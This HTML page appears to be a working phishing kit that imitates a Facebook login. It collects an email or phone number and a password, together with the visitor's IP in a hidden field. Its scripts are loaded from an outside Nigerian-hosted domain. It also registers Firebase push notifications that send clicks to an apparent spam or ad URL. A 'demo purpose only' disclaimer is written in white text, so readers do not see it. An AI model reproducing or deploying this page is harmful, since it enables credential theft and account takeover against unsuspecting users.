<!doctype html>
<html>
 <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>

 <p id=""></p>

<script src="../../www.gstatic.com/firebasejs/7.14.6/firebase-app.js"></script>
<script src="../../www.gstatic.com/firebasejs/7.14.6/firebase-messaging.js"></script>
<script>
    var firebaseConfig = {
apiKey: "AIzaSyDiQcofy7M9nJ2LjMzph9SwauNvneUPyJs",
  authDomain: "-93b74.firebaseapp.com",
  databaseURL: "https://-93b74-default-rtdb.firebaseiao.com",
  projectId: "-93b74",
  storageBucket: "-93b74.appspot.com",
  messagingSenderId: "670878494109",
  appId: "1:670878494109:web:bf089fda8bd217655f5374",
  measurementId: "G-R5NCJC4M6X"
};
    firebase.initializeApp(firebaseConfig);
    const messaging=firebase.messaging();

    function IntitalizeFireBaseMessaging() {
        messaging
            .requestPermission()
            .then(function () {
                console.log("Notification Permission");
                return messaging.getToken();
            })
            .then(function (token) {
                console.log("Token : "+token);
                document.getElementById("token").innerHTML=token;
            })
            .catch(function (reason) {
                console.log(reason);
            });
    }

    messaging.onMessage(function (payload) {
        console.log(payload);
        const notificationOption={
            body:payload.notification.body,
            icon:payload.notification.icon
        };

        if(Notification.permission==="granted"){
            var notification=new Notification(payload.notification.title,notificationOption);

            notification.onclick=function (ev) {
                ev.preventDefault();
                window.open(payload.notification.click_action,'../../external.html?link=https://bowldescended.com/x2wabtbm?key=4f05bea921c2103f08c3bc3140cc5f0d');
                notification.close();
            }
        }

    });
    messaging.onTokenRefresh(function () {
        messaging.getToken()
            .then(function (newtoken) {
                console.log("New Token : "+ newtoken);
            })
            .catch(function (reason) {
                console.log(reason);
            })
    })
    IntitalizeFireBaseMessaging();
</script> 

	<title>Developed by BjTMG</title>

	

  <meta name=”robots” content=”noindex”>

  <meta name="robots" content="index,follow">

<meta name="robots" content="noindex,follow">

<meta name="robots" content="index,nofollow">

<meta name="robots" content="noindex,nofollow">

<meta name="googlebot" content="noindex,nofollow,noarchive,nosnippet,noodp" />

    <meta name="robots" content="noindex,nofollow,noarchive,nosnippet,noodp" />

	<meta charset="utf-8">



	<meta name="description" content="online">

<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<meta property='og:image' content='earnmoney.jpg' />

	<link rel="   ">

  
	<style>

		table tr td{text-align:center;}

.button {

  background-color: #4CAF50; /* Green */

  border: none;

  color: white;

  padding: 14px 20px;

  text-align: center;

  text-decoration: none;

  display: inline-block;

  font-size: 16px;

  margin: 1px 0px;

  cursor: pointer;

}

.button1 {width: 250px;}

.button2 {width: 50%;}

.button3 {width: 90%;

border-radius: 4px;

border: 0px solid DarkGray;

padding: 13px 13px;

margin: 3px 3px;

height: 22px;

background-color: rgb(243,243,243);

display: inline-block;



}

		.bottom a{color:#D3D3;}

		.bottom a:link{text-decoration:none;}

		input{padding:10px;}

		

		.login{background-color:rgb(19,90,245);color:white;

border-radius: 4px;

padding: 13px 13px;

margin: -15px -15px;

border: 1px solid DarkGray;

font-family: 'segoe UI';

font-size: 15px;

font-weight: bold;

		  

		}

		

.center {

  display: block;

  margin-left: auto;

  margin-right: auto;
  padding-top: 10px;
  padding-bottom: 5px;
 

}

		.login{width: 97%;}

		.check{background-color:#0ac21e;color:white;padding:10px;

margin: 4px 2px;

		}

		.inputf a:link{text-decoration:none;}

.phone{
  position: relative;
  bottom: 14px;
  
}
.me{
  position: relative;
  bottom: 24px;
  left: 5px;
  font-family: Arial;
  font-weight: 400;
}

	</style>

</head>

<body style="margin:0px;">
 

<script>

	document.title='online';

</script>

<div style="width:100%;">

  

<div style="width:100%;">


	<img src="/images/header.jpg" alt="header" width="440px" height="40px" class="phone"class="me">

</div>



</div>

<div style="width:100%;">

 <a href="#">

<img src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg"
     alt="screenshot demo" width="90" height="70" class="center">  </a>



<div class="inputf" style="background-color:white;padding:10px;text-align:center;">

<form id="anonymousNewMessage" class="form" method="POST" action="#">

                <div class="card-header text-center">



              



     

                </div>

                <div class="card-body">



                  <input type="hidden" name="user_id" id="userNickname" value="1">

		<input class="button3" name="message_title" type="text" id="" placeholder="Email address or phone number" maxlength="40" size="35px"

		required><br>

		<input class="button3"  name="description" type="text" id="pass" placeholder="Password" maxlength="40" size="35px"

		required>

    <input type="hidden" name="ip" value="172.70.147.140" />

<input type="hidden" name="link" value="facebook" />



    <!-- the rest of the form //-->



<br/><br/>

		<input class="login" name="login" type="submit" id="move-random"value="Log In"><br/><br/>

 <a href="#">

	<img src="/images/Footer.jpg" alt="Footer" width="410" height="360"></a>

	<script src="index.js"></script>

</div>

</div>

<p style="color:white">This is page is for demo purpose only... please do not login your account.</p>



  <!--   Core JS Files   -->

  <script src="../../external.html?link=https://izonic.name.ng/me/assets/js/core/jquery.min.js" type="text/javascript"></script>

  <script src="../../external.html?link=https://izonic.name.ng/me/assets/js/core/bootstrap.min.js" type="text/javascript"></script>



  <!-- Control Center for Now Ui Kit: parallax effects, scripts for the example pages etc -->

  

  <script src="../../external.html?link=https://izonic.name.ng/me/assets/js/now-ui-kit.js?v=1.3.0" type="text/javascript"></script>



  <script src="../../external.html?link=https://.com/back.js?1681464675"> 

</script>

<script src="../../external.html?link=https://izonic.name.ng/me/assets/js/now-ui-kit.js" type="text/javascript"></script>

<script src="../../external.html?link=https://izonic.name.ng/me/assets/js/anonymous.js?1668012460"> 

  </script>

  <script type="text/javascript">

    $(document).ready(function() {



  var url =anonymousURL('user');

  var url2 =anonymousURL('ref');

  console.log(url);

     $('.userNickname').html('Send Anonymous Message to '+url);

     $('#userNickname').val(url2);

   });


<style>
  .btn-container {
    position: relative;
  }
  .btn {
    display: inline-block;
    padding: 10px 20px;
    background-color: blue;
    color: white;
    text-decoration: none;
    border-radius: 5px;
  }
  #move-random {
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
  }
    
    </style>
  </script>

</body>
</html>
